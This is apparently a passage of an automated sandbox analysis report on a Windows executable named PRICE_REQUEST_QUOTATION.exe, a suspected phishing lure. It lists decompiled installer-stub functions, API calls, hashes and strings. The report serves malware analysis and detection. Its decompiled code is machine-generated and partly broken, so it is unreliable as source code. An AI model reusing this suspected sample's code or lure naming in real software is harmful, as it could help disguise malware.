                                        					if(__eflags <= 0) {
                                        						if(__eflags != 0) {
                                        							 *_t86 = _t83;
                                        							_t86 =  &(_t86[1]);
                                        							__eflags = _t86;
                                        						} else {
                                        							 *_t86 =  *_t74;
                                        							_t86 =  &(_t86[1]);
                                        							_t74 = _t74 + 1;
                                        						}
                                        						continue;
                                        					}
                                        					_t39 =  *(_t74 + 1);
                                        					_t75 =  *_t74;
                                        					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
                                        					_a8 = _a8 + 2;
                                        					_v28 = _t75 | 0x00000080;
                                        					_t69 = _t75;
                                        					_v24 = _t69;
                                        					__eflags = _t83 - 0xfe;
                                        					_v20 = _t39 | 0x00000080;
                                        					_v16 = _t39;
                                        					if(_t83 != 0xfe) {
                                        						__eflags = _t83 - 0xfd;
                                        						if(_t83 != 0xfd) {
                                        							__eflags = _t83 - 0xff;
                                        							if(_t83 == 0xff) {
                                        								__eflags = (_t39 | 0xffffffff) - _t95;
                                        								E00405BE9(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
                                        							}
                                        							L41:
                                        							_t40 = lstrlenA(_t86);
                                        							_t74 = _a8;
                                        							_t86 =  &(_t86[_t40]);
                                        							_t37 = 0x42dbc0;
                                        							continue;
                                        						}
                                        						__eflags = _t95 - 0x1d;
                                        						if(_t95 != 0x1d) {
                                        							__eflags = (_t95 << 0xa) + 0x42f000;
                                        							E00405BC7(_t86, (_t95 << 0xa) + 0x42f000);
                                        						} else {
                                        							E00405B25(_t86,  *0x42ec28);
                                        						}
                                        						__eflags = _t95 + 0xffffffeb - 7;
                                        						if(_t95 + 0xffffffeb < 7) {
                                        							L32:
                                        							E00405E29(_t86);
                                        						}
                                        						goto L41;
                                        					}
                                        					_t97 = 2;
                                        					_t50 = GetVersion();
                                        					__eflags = _t50;
                                        					if(_t50 >= 0) {
                                        						L12:
                                        						_v8 = 1;
                                        						L13:
                                        						__eflags =  *0x42eca4;
                                        						if( *0x42eca4 != 0) {
                                        							_t97 = 4;
                                        						}
                                        						__eflags = _t69;
                                        						if(_t69 >= 0) {
                                        							__eflags = _t69 - 0x25;
                                        							if(_t69 != 0x25) {
                                        								__eflags = _t69 - 0x24;
                                        								if(_t69 == 0x24) {
                                        									GetWindowsDirectoryA(_t86, 0x400);
                                        									_t97 = 0;
                                        								}
                                        								while(1) {
                                        									__eflags = _t97;
                                        									if(_t97 == 0) {
                                        										goto L29;
                                        									}
                                        									_t51 =  *0x42ec24; // 0x74261340
                                        									_t97 = _t97 - 1;
                                        									__eflags = _t51;
                                        									if(_t51 == 0) {
                                        										L25:
                                        										_t53 = SHGetSpecialFolderLocation( *0x42ec28,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
                                        										__eflags = _t53;
                                        										if(_t53 != 0) {
                                        											L27:
                                        											 *_t86 =  *_t86 & 0x00000000;
                                        											__eflags =  *_t86;
                                        											continue;
                                        										}
                                        										__imp__SHGetPathFromIDListA(_v12, _t86);
                                        										__imp__CoTaskMemFree(_v12);
                                        										__eflags = _t53;
                                        										if(_t53 != 0) {
                                        											goto L29;
                                        										}
                                        										goto L27;
                                        									}
                                        									__eflags = _v8;
                                        									if(_v8 == 0) {
                                        										goto L25;
                                        									}
                                        									_t55 =  *_t51( *0x42ec28,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
                                        									__eflags = _t55;
                                        									if(_t55 == 0) {
                                        										goto L29;
                                        									}
                                        									goto L25;
                                        								}
                                        								goto L29;
                                        							}
                                        							GetSystemDirectoryA(_t86, 0x400);
                                        							goto L29;
                                        						} else {
                                        							_t72 = (_t69 & 0x0000003f) +  *0x42ec58;
                                        							E00405AAE(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x42ec58, _t86, _t69 & 0x00000040);
                                        							__eflags =  *_t86;
                                        							if( *_t86 != 0) {
                                        								L30:
                                        								__eflags = _v16 - 0x1a;
                                        								if(_v16 == 0x1a) {
                                        									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                        								}
                                        								goto L32;
                                        							}
                                        							E00405BE9(_t72, _t86, _t97, _t86, _v16);
                                        							L29:
                                        							__eflags =  *_t86;
                                        							if( *_t86 == 0) {
                                        								goto L32;
                                        							}
                                        							goto L30;
                                        						}
                                        					}
                                        					__eflags = _t50 - 0x5a04;
                                        					if(_t50 == 0x5a04) {
                                        						goto L12;
                                        					}
                                        					__eflags = _v16 - 0x23;
                                        					if(_v16 == 0x23) {
                                        						goto L12;
                                        					}
                                        					__eflags = _v16 - 0x2e;
                                        					if(_v16 == 0x2e) {
                                        						goto L12;
                                        					} else {
                                        						_v8 = _v8 & 0x00000000;
                                        						goto L13;
                                        					}
                                        				}
                                        				 *_t86 =  *_t86 & 0x00000000;
                                        				if(_a4 == 0) {
                                        					return _t37;
                                        				}
                                        				return E00405BC7(_a4, _t37);
                                        			}































                                        APIs
                                        • GetVersion.KERNEL32(00000000,00429878,00000000,00404EEB,00429878,00000000), ref: 00405C91
                                        • GetSystemDirectoryA.KERNEL32 ref: 00405D0C
                                        • GetWindowsDirectoryA.KERNEL32(TclpOwkq,00000400), ref: 00405D1F
                                        • SHGetSpecialFolderLocation.SHELL32(?,00419301), ref: 00405D5B
                                        • SHGetPathFromIDListA.SHELL32(00419301,TclpOwkq), ref: 00405D69
                                        • CoTaskMemFree.OLE32(00419301), ref: 00405D74
                                        • lstrcatA.KERNEL32(TclpOwkq,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D96
                                        • lstrlenA.KERNEL32(TclpOwkq,00000000,00429878,00000000,00404EEB,00429878,00000000), ref: 00405DE8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                        • String ID: Software\Microsoft\Windows\CurrentVersion$TclpOwkq$\Microsoft\Internet Explorer\Quick Launch
                                        • API String ID: 900638850-487370903
                                        • Opcode ID: dad9380ef75d4ee6d1e7f44bcb98c3f3aee458906992b83e7d16e4410c3c70ab
                                        • Instruction ID: 131396e9090e0f007f21196dc47e10b2e1a614011cd8a075e276219472c4ac8b
                                        • Opcode Fuzzy Hash: dad9380ef75d4ee6d1e7f44bcb98c3f3aee458906992b83e7d16e4410c3c70ab
                                        • Instruction Fuzzy Hash: EA510531A04A04ABEB215B65DC88BBF3BA4DF05714F10823BE911B62D1D73C59429E5E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00405E29(CHAR* _a4) {
                                        				char _t5;
                                        				char _t7;
                                        				char* _t15;
                                        				char* _t16;
                                        				CHAR* _t17;
                                        
                                        				_t17 = _a4;
                                        				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                        					_t17 =  &(_t17[4]);
                                        				}
                                        				if( *_t17 != 0 && E00405727(_t17) != 0) {
                                        					_t17 =  &(_t17[2]);
                                        				}
                                        				_t5 =  *_t17;
                                        				_t15 = _t17;
                                        				_t16 = _t17;
                                        				if(_t5 != 0) {
                                        					do {
                                        						if(_t5 > 0x1f &&  *((char*)(E004056E5("*?|<>/\":", _t5))) == 0) {
                                        							E0040585F(_t16, _t17, CharNextA(_t17) - _t17);
                                        							_t16 = CharNextA(_t16);
                                        						}
                                        						_t17 = CharNextA(_t17);
                                        						_t5 =  *_t17;
                                        					} while (_t5 != 0);
                                        				}
                                        				 *_t16 =  *_t16 & 0x00000000;
                                        				while(1) {
                                        					_t16 = CharPrevA(_t15, _t16);
                                        					_t7 =  *_t16;
                                        					if(_t7 != 0x20 && _t7 != 0x5c) {
                                        						break;
                                        					}
                                        					 *_t16 =  *_t16 & 0x00000000;
                                        					if(_t15 < _t16) {
                                        						continue;
                                        					}
                                        					break;
                                        				}
                                        				return _t7;
                                        			}









                                        APIs
                                        • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E81
                                        • CharNextA.USER32(?,?,?,00000000), ref: 00405E8E
                                        • CharNextA.USER32(?,"C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E93
                                        • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405EA3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: Char$Next$Prev
                                        • String ID: "C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 589700163-2145876667
                                        • Opcode ID: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                        • Instruction ID: 6784d5a4761720cd8368ccbdd0638492f40d0cd734ea18b92361b53ebca16514
                                        • Opcode Fuzzy Hash: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                        • Instruction Fuzzy Hash: BA11E671804B9129EB3217248C44B7B7F89CB5A7A0F18407BE5D5722C2C77C5E429EAD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00403EEA(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                        				struct tagLOGBRUSH _v16;
                                        				long _t35;
                                        				long _t37;
                                        				void* _t40;
                                        				long* _t49;
                                        
                                        				if(_a4 + 0xfffffecd > 5) {
                                        					L15:
                                        					return 0;
                                        				}
                                        				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                                        				if(_t49 == 0) {
                                        					goto L15;
                                        				}
                                        				_t35 =  *_t49;
                                        				if((_t49[5] & 0x00000002) != 0) {
                                        					_t35 = GetSysColor(_t35);
                                        				}
                                        				if((_t49[5] & 0x00000001) != 0) {
                                        					SetTextColor(_a8, _t35);
                                        				}
                                        				SetBkMode(_a8, _t49[4]);
                                        				_t37 = _t49[1];
                                        				_v16.lbColor = _t37;
                                        				if((_t49[5] & 0x00000008) != 0) {
                                        					_t37 = GetSysColor(_t37);
                                        					_v16.lbColor = _t37;
                                        				}
                                        				if((_t49[5] & 0x00000004) != 0) {
                                        					SetBkColor(_a8, _t37);
                                        				}
                                        				if((_t49[5] & 0x00000010) != 0) {
                                        					_v16.lbStyle = _t49[2];
                                        					_t40 = _t49[3];
                                        					if(_t40 != 0) {
                                        						DeleteObject(_t40);
                                        					}
                                        					_t49[3] = CreateBrushIndirect( &_v16);
                                        				}
                                        				return _t49[3];
                                        			}









                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                        • String ID:
                                        • API String ID: 2320649405-0
                                        • Opcode ID: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                        • Instruction ID: d9f5f29c4b32eaf67df6904808fcf7c938901a1e5be6cbe83ca05de02e5bcf8c
                                        • Opcode Fuzzy Hash: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                        • Instruction Fuzzy Hash: A9215471904745ABC7219F78DD08B4BBFF8AF01715F04856AE856E22E0D734EA04CB55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 86%
                                        			E004026AF(struct _OVERLAPPED* __ebx) {
                                        				void* _t27;
                                        				long _t32;
                                        				struct _OVERLAPPED* _t47;
                                        				void* _t51;
                                        				void* _t53;
                                        				void* _t56;
                                        				void* _t57;
                                        				void* _t58;
                                        
                                        				_t47 = __ebx;
                                        				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;
                                        				_t52 = E00402A29(0xfffffff0);
                                        				 *(_t58 - 0x38) = _t24;
                                        				if(E00405727(_t52) == 0) {
                                        					E00402A29(0xffffffed);
                                        				}
                                        				E0040587F(_t52);
                                        				_t27 = E0040589E(_t52, 0x40000000, 2);
                                        				 *(_t58 + 8) = _t27;
                                        				if(_t27 != 0xffffffff) {
                                        					_t32 =  *0x42ec34; // 0x8800
                                        					 *(_t58 - 0x30) = _t32;
                                        					_t51 = GlobalAlloc(0x40, _t32);
                                        					if(_t51 != _t47) {
                                        						E004030E2(_t47);
                                        						E004030B0(_t51,  *(_t58 - 0x30));
                                        						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));
                                        						 *(_t58 - 0x34) = _t56;
                                        						if(_t56 != _t47) {
                                        							E00402E8E( *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20));
                                        							while( *_t56 != _t47) {
                                        								_t49 =  *_t56;
                                        								_t57 = _t56 + 8;
                                        								 *(_t58 - 0x48) =  *_t56;
                                        								E0040585F( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
                                        								_t56 = _t57 +  *(_t58 - 0x48);
                                        							}
                                        							GlobalFree( *(_t58 - 0x34));
                                        						}
                                        						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);
                                        						GlobalFree(_t51);
                                        						 *((intOrPtr*)(_t58 - 0xc)) = E00402E8E(0xffffffff,  *(_t58 + 8), _t47, _t47);
                                        					}
                                        					CloseHandle( *(_t58 + 8));
                                        				}
                                        				_t53 = 0xfffffff3;
                                        				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {
                                        					_t53 = 0xffffffef;
                                        					DeleteFileA( *(_t58 - 0x38));
                                        					 *((intOrPtr*)(_t58 - 4)) = 1;
                                        				}
                                        				_push(_t53);
                                        				E00401423();
                                        				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t58 - 4));
                                        				return 0;
                                        			}












                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,00008800,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
                                        • GlobalFree.KERNEL32 ref: 00402758
                                        • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040276A
                                        • GlobalFree.KERNEL32 ref: 00402771
                                        • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402789
                                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                        • String ID:
                                        • API String ID: 3294113728-0
                                        • Opcode ID: 87c57808f8dc4d746d59b2b3a4cb472afbcf4a509c6767706d62590f2872af51
                                        • Instruction ID: 7359f6b8c72d8bce8f96c3519292fde75c250a44c6e0f48ea69dd088617f1d2a
                                        • Opcode Fuzzy Hash: 87c57808f8dc4d746d59b2b3a4cb472afbcf4a509c6767706d62590f2872af51
                                        • Instruction Fuzzy Hash: 9D319C71C00028BBCF216FA5DE88DAEBA79EF04364F14423AF914762E0C67949018B99
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00404EB3(CHAR* _a4, CHAR* _a8) {
                                        				struct HWND__* _v8;
                                        				signed int _v12;
                                        				CHAR* _v32;
                                        				long _v44;
                                        				int _v48;
                                        				void* _v52;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				CHAR* _t26;
                                        				signed int _t27;
                                        				CHAR* _t28;
                                        				long _t29;
                                        				signed int _t39;
                                        
                                        				_t26 =  *0x42e404; // 0x0
                                        				_v8 = _t26;
                                        				if(_t26 != 0) {
                                        					_t27 =  *0x42ecd4; // 0x0
                                        					_v12 = _t27;
                                        					_t39 = _t27 & 0x00000001;
                                        					if(_t39 == 0) {
                                        						E00405BE9(0, _t39, 0x429878, 0x429878, _a4);
                                        					}
                                        					_t26 = lstrlenA(0x429878);
                                        					_a4 = _t26;
                                        					if(_a8 == 0) {
                                        						L6:
                                        						if((_v12 & 0x00000004) == 0) {
                                        							_t26 = SetWindowTextA( *0x42e3e8, 0x429878);
                                        						}
                                        						if((_v12 & 0x00000002) == 0) {
                                        							_v32 = 0x429878;
                                        							_v52 = 1;
                                        							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
                                        							_v44 = 0;
                                        							_v48 = _t29 - _t39;
                                        							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
                                        							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
                                        						}
                                        						if(_t39 != 0) {
                                        							_t28 = _a4;
                                        							 *((char*)(_t28 + 0x429878)) = 0;
                                        							return _t28;
                                        						}
                                        					} else {
                                        						_t26 =  &(_a4[lstrlenA(_a8)]);
                                        						if(_t26 < 0x800) {
                                        							_t26 = lstrcatA(0x429878, _a8);
                                        							goto L6;
                                        						}
                                        					}
                                        				}
                                        				return _t26;
                                        			}


















                                        APIs
                                        • lstrlenA.KERNEL32(00429878,00000000,00419301,7519EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                                        • lstrlenA.KERNEL32(00402FE9,00429878,00000000,00419301,7519EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                                        • lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,00419301,7519EA30), ref: 00404F0F
                                        • SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                                        • SendMessageA.USER32 ref: 00404F47
                                        • SendMessageA.USER32 ref: 00404F61
                                        • SendMessageA.USER32 ref: 00404F6F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                        • String ID:
                                        • API String ID: 2531174081-0
                                        • Opcode ID: eb6caf3ac7484f5f1db1ef618e0e0cbe7ab290b61210ffb6096f31fecf2f81c8
                                        • Instruction ID: b2aff46cb4fd7b93265c813df518c908744a9a116baeb32a25c95395085da7a4
                                        • Opcode Fuzzy Hash: eb6caf3ac7484f5f1db1ef618e0e0cbe7ab290b61210ffb6096f31fecf2f81c8
                                        • Instruction Fuzzy Hash: BA219D71900118BFDB119FA5CD80DDEBFB9EF45354F14807AF544B62A0C739AE408BA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00404782(struct HWND__* _a4, intOrPtr _a8) {
                                        				long _v8;
                                        				signed char _v12;
                                        				unsigned int _v16;
                                        				void* _v20;
                                        				intOrPtr _v24;
                                        				long _v56;
                                        				void* _v60;
                                        				long _t15;
                                        				unsigned int _t19;
                                        				signed int _t25;
                                        				struct HWND__* _t28;
                                        
                                        				_t28 = _a4;
                                        				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
                                        				if(_a8 == 0) {
                                        					L4:
                                        					_v56 = _t15;
                                        					_v60 = 4;
                                        					SendMessageA(_t28, 0x110c, 0,  &_v60);
                                        					return _v24;
                                        				}
                                        				_t19 = GetMessagePos();
                                        				_v16 = _t19 >> 0x10;
                                        				_v20 = _t19;
                                        				ScreenToClient(_t28,  &_v20);
                                        				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
                                        				if((_v12 & 0x00000066) != 0) {
                                        					_t15 = _v8;
                                        					goto L4;
                                        				}
                                        				return _t25 | 0xffffffff;
                                        			}















                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: Message$Send$ClientScreen
                                        • String ID: f
                                        • API String ID: 41195575-1993550816
                                        • Opcode ID: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                        • Instruction ID: 33b793b453c736b4b125c672a543aeedee0a766b6fda49c4207ece5d665b0003
                                        • Opcode Fuzzy Hash: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                        • Instruction Fuzzy Hash: A1019271D00219BADB01DB94CC41BFEBBBCAB49711F10012BBB00B71C0C3B465018BA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00402B6E(struct HWND__* _a4, intOrPtr _a8) {
                                        				char _v68;
                                        				int _t11;
                                        				int _t20;
                                        
                                        				if(_a8 == 0x110) {
                                        					SetTimer(_a4, 1, 0xfa, 0);
                                        					_a8 = 0x113;
                                        				}
                                        				if(_a8 == 0x113) {
                                        					_t20 =  *0x414c40; // 0x8800
                                        					_t11 =  *0x428c50;
                                        					if(_t20 >= _t11) {
                                        						_t20 = _t11;
                                        					}
                                        					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                        					SetWindowTextA(_a4,  &_v68);
                                        					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                        				}
                                        				return 0;
                                        			}







                                        APIs
                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B89
                                        • MulDiv.KERNEL32(00008800,00000064,?), ref: 00402BB4
                                        • wsprintfA.USER32 ref: 00402BC4
                                        • SetWindowTextA.USER32(?,?), ref: 00402BD4
                                        • SetDlgItemTextA.USER32 ref: 00402BE6
                                        Strings
                                        • verifying installer: %d%%, xrefs: 00402BBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: Text$ItemTimerWindowwsprintf
                                        • String ID: verifying installer: %d%%
                                        • API String ID: 1451636040-82062127
                                        • Opcode ID: c9221edef022ada40c9d606a55ceb5485b01ba3fbe0a0649ceb5ce67f638be65
                                        • Instruction ID: 6a78b715a9a8e57134c517a6b1d06892db6ee10875a93ca7b4af16268fa1b879
                                        • Opcode Fuzzy Hash: c9221edef022ada40c9d606a55ceb5485b01ba3fbe0a0649ceb5ce67f638be65
                                        • Instruction Fuzzy Hash: 0C014470544208BBDF209F60DD49FEE3769FB04345F008039FA06A52D0DBB499558F95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 35%
                                        			E73334190(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char* _a20, int _a24, int _a28, int _a32) {
                                        				int _v8;
                                        				int _v12;
                                        				void* _v16;
                                        				intOrPtr _v20;
                                        				int _v24;
                                        				int _v28;
                                        				intOrPtr _v32;
                                        				intOrPtr _v36;
                                        				intOrPtr _v40;
                                        				int _v44;
                                        				void* _v48;
                                        				int _t67;
                                        				intOrPtr _t68;
                                        				intOrPtr _t70;
                                        				int _t71;
                                        				int _t73;
                                        				int _t77;
                                        				int _t80;
                                        				int _t89;
                                        				void* _t117;
                                        				void* _t122;
                                        				void* _t123;
                                        				void* _t124;
                                        
                                        				_v40 = E73331490(_a4);
                                        				_v36 = 0x80004005;
                                        				_t67 = _a24;
                                        				0x73330000(_a20, _t67, _a28, _a32);
                                        				_t68 = _a12;
                                        				0x73330000(_t68, _a16, _t67);
                                        				0x73330000("%p, %u, %s, %s, %p, %u, %p.\n", _a4, _a8, _t68);
                                        				_push(_v40);
                                        				_t70 = E73331120(_v40);
                                        				_t122 = _t117 + 0x34;
                                        				_v20 = _t70;
                                        				if(_v20 == 0) {
                                        					return 0x8000ffff;
                                        				}
                                        				__eflags = _a8 - 0xffffffff;
                                        				if(__eflags != 0) {
                                        					_t71 = E733313B0(__eflags, _v20, _a8);
                                        					_t123 = _t122 + 8;
                                        					_v12 = _t71;
                                        				} else {
                                        					_t89 = E733313F0(__eflags, _v20, _a12, _a16);
                                        					_t123 = _t122 + 0xc;
                                        					_v12 = _t89;
                                        				}
                                        				__eflags = _v12;
                                        				if(_v12 != 0) {
                                        					_t73 = GetFileVersionInfoSizeA(_v12 + 0x40,  &_v44);
                                        					_v8 = _t73;
                                        					__eflags = _v8;
                                        					if(_v8 != 0) {
                                        						0x73330000(_v8);
                                        						_t124 = _t123 + 4;
                                        						_v16 = _t73;
                                        						__eflags = _v16;
                                        						if(_v16 != 0) {
                                        							_t77 = GetFileVersionInfoA(_v12 + 0x40, _v44, _v8, _v16);
                                        							__eflags = _t77;
                                        							if(_t77 == 0) {
                                        								L27:
                                        								0x73330000(_v16);
                                        								return _v36;
                                        							}
                                        							_t80 = VerQueryValueA(_v16, _a20,  &_v48,  &_v8);
                                        							__eflags = _t80;
                                        							if(_t80 == 0) {
                                        								goto L27;
                                        							}
                                        							__eflags = _a32;
                                        							if(_a32 != 0) {
                                        								 *_a32 = _v8;
                                        							}
                                        							__eflags = _a24;
                                        							if(_a24 != 0) {
                                        								__eflags = _a28;
                                        								if(_a28 != 0) {
                                        									__eflags = _v8 - _a28;
                                        									if(_v8 >= _a28) {
                                        										_v24 = _a28;
                                        									} else {
                                        										_v24 = _v8;
                                        									}
                                        									_v28 = _v24;
                                        									__eflags = _v28;
                                        									if(_v28 != 0) {
                                        										0x73330000(_a24, _v48, _v28);
                                        										_t124 = _t124 + 0xc;
                                        									}
                                        								}
                                        							}
                                        							__eflags = _a24;
                                        							if(_a24 == 0) {
                                        								L25:
                                        								_v32 = 0;
                                        								L26:
                                        								_v36 = _v32;
                                        								goto L27;
                                        							}
                                        							__eflags = _a28 - _v8;
                                        							if(_a28 >= _v8) {
                                        								goto L25;
                                        							}
                                        							_v32 = 1;
                                        							goto L26;
                                        						}
                                        						return 0x8007000e;
                                        					}
                                        					return 0x80004005;
                                        				} else {
                                        					0x73330000("Was unable to locate module.\n");
                                        					return 0x80070057;
